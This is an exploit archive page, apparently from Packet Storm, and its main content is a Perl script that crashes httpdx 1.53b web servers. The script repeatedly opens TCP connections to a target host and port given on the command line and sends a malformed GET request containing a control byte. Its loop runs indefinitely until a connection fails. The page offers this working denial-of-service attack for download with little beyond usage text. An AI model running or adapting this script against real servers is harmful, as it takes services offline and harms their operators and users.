what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

httpdx 1.53b Denial Of Service

httpdx 1.53b Denial Of Service
Posted Feb 23, 2010
Authored by d3b4g

httpdx version 1.53b remote denial of service exploit.

tags | exploit, remote, denial of service
SHA-256 | 087a769e8904bc84273507414999b8449b65fc18260ded7525b7f5e50ecd71b6

httpdx 1.53b Denial Of Service

Change Mirror Download
#!/usr/bin/perl
#
# Exploit Title: httpdx1.53b (sockets++ crash) Remote Denial of Service exploit
# Date: 22.02.2010
# Author: d3b4g
# Software Link: http://httpdx.sourceforge.net/downloads/
# Version: 1.53b
# Tested on: windows xpsp3 vmware
# webpage:www.d3b4g.info
# I'm from tiny little island's of maldivies
#
# The vulnerability is caused due to an error in multi-socket.
# This can be exploited to crash the HTTP service.


use IO::Socket;
print "[+] Author : d3b4g\n";
print "[+] Soft : httpdx1.53b Remote DoS\n";

if (@ARGV < 1)
{
print "[-] Usage: <file.pl> <host> <port>\n";
print "[-] Exemple: file.pl 192.168.2.1 80\n";
exit;
}


$ip = $ARGV[0];
$port = $ARGV[1];

print "[+] Sending request...\n";

for($i=0;$i=4;$i++)
{
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-]Done!\n";

print $socket "GET \x11 HTTP/1.0\n\r\n";
}

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close